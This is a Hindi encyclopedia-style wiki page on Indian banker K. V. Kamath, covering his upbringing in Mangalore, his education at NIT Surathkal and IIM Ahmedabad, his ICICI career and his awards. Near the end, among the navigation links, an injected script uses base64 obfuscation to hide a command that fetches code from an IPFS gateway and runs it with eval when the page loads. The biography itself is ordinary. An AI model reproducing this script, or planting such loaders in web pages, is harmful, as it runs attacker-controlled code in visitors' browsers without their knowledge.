के. वी. कामथ

भारत डिस्कवरी प्रस्तुति
Revision as of 11:45, 4 October 2017 by कविता भाटिया (talk | contribs)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search
के. वी. कामथ
पूरा नाम कुंदापुर वामन कामथ
जन्म 2 दिसम्बर 1947
जन्म भूमि कर्नाटक, मंगलौर
अभिभावक विश्वनाथ कामथ
पति/पत्नी राजलक्ष्मी कामथ
कर्म भूमि भारत
कर्म-क्षेत्र उद्योगपति
शिक्षा राष्ट्रीय प्रौद्योगिकी संस्थान, भारतीय प्रबंध संस्थान
पुरस्कार-उपाधि पद्म भूषण
प्रसिद्धि आईसीआईसीआई बैंक के गैर-कार्यकारी चेयरमैन
नागरिकता भारतीय
अन्य जानकारी कामथ कॉन्फ़ेडरेशन ऑफ़ इंडियन इंडस्ट्री (सीआईआई) के राष्ट्रिय समिति के सदस्य भी हैं।
अद्यतन‎

के. वी. कामथ (अंग्रेजी: K. V. Kamath, जन्म 2 दिसम्बर 1947, कर्नाटक, मंगलौर) भारतीय बैंकिंग क्षेत्र के दिग्गजों में से एक हैं। वो निजी क्षेत्र के सबसे बड़े बैंक आईसीआईसीआई बैंक के पूर्व प्रबंध निदेशक और मुख्य कार्यकारी अधिकारी रह चुके हैं और वर्तमान में वह इसके गैर-कार्यकारी चेयरमैन हैं। केवी कामथ जून 2015 में उभरते विकासशील देश ब्राजील, रूस, भारत, चीन और दक्षिण अफ्रीका (ब्रिक्स) देशों द्वारा स्थापित किए जा रहे 50 अरब डॉलर के न्यू डवेलपमेंट बैंक (एनडीबी ) के मुखिया चुने गए। कामथ देश की दूसरी सबसे बड़ी आई टी कंपनी, इनफ़ोसिस लिमिटेड के भी चेयरमैन रह चुके हैं। उन्होंने अपनी कुसाग्रता से भारतीय बैंकिंग क्षेत्र का आधुनिकीकरण किया। ‘यूनिवर्सल बैंकिंग’ और कर्मचारियों के उचित प्रबंधन के जरिये उन्होंने भारत के बैंकिंग क्षेत्र में बड़ा बदलाव किया। वह हॉस्टन-स्थित तेल कंपनी स्च्लुम्बेर्गेर और भारतीय बहुराष्ट्रीय फार्मा कंपनी ‘लूपिन’ के भी स्वतंत्र निदेशक रह चुके हैं।[1]

जीवन परिचय

कामथ का जन्म 2 दिसम्बर 1947 को कर्नाटक के मंगलौर में एक गौड़ सारस्वत ब्राह्मण परिवार में हुआ था। उनके पिता का नाम विश्वनाथ कामथ था। उन्होंने अपना बचपन मुख्यतः मंगलौर में ही बिताया। उनकी प्रारंभिक शिक्षा कन्नड़-माध्यम स्कूल में हुई। मैट्रिकुलेशन के बाद उन्होंने अपना पीयूसी सेंट अलोयसिउस कॉलेज से पूरा किया। प्री-यूनिवर्सिटी (पीयूसी) के बाद उन्होंने नेशनल इंस्टिट्यूट ऑफ़ टेक्नोलॉजी कर्नाटक, सुरथकल, में मैकेनिकल इंजीनियरिंग विषय में दाखिला लिया। वर्ष 1969 में नेशनल इंस्टिट्यूट ऑफ़ टेक्नोलॉजी, सुरथकल, से उन्होंने स्नातक की परीक्षा पास की और प्रबंधन की शिक्षा के लिए इंडियन इंस्टिट्यूट ऑफ़ मैनेजमेंट, अहमदाबाद, में दाखिला लिया।[1]

कॅरियर

इंडियन इंस्टिट्यूट ऑफ़ मैनेजमेंट, अहमदाबाद, से प्रबंधन की शिक्षा पूरी करने के बाद कामथ ने वर्ष 1971 में आईसीआईसीआई (इंडस्ट्रियल क्रेडिट एंड इन्वेस्टमेंट कारपोरेशन ऑफ़ इंडिया) के साथ अपने करियर की शुरुआत की। आईसीआईसीआई में ‘प्रोजेक्ट फाइनेंस’ से लेकर उन्होंने धीरे-धीरे संस्था के लगभग हर विभाग में कार्य किया। वहाँ उन्होंने प्रबंधन की जिम्मेदारियां भी संभाली और इसी के तहत आईसीआईसीआई के कार्य-प्रणाली का कम्प्यूटरीकरण भी प्रारम्भ किया। इस प्रकार उन्होंने आईसीआईसीआई में कम्प्यूटरीकरण प्रारंभ कर भारत के बैंकिंग क्षेत्र में बड़ा बदलाव किया।[1]

सम्मान और पुरस्कार

  • द एशियन बनकर जर्नल ऑफ़ सिंगापोर द्वारा ‘एशियन बैंकों के सबसे e-savvy CEO
  • मुंबई मैनेजमेंट एसोसिएशन द्वारा ‘फाइनेंस मैन ऑफ़ द इयर’ सम्मान


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. 1.0 1.1 1.2 के. वी. कामथ (हिन्दी) itshindi.com। अभिगमन तिथि: 03 अक्टूबर, 2017।

बाहरी कड़ियाँ

संबंधित लेख

के. वी. कामथ विषय सूची


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः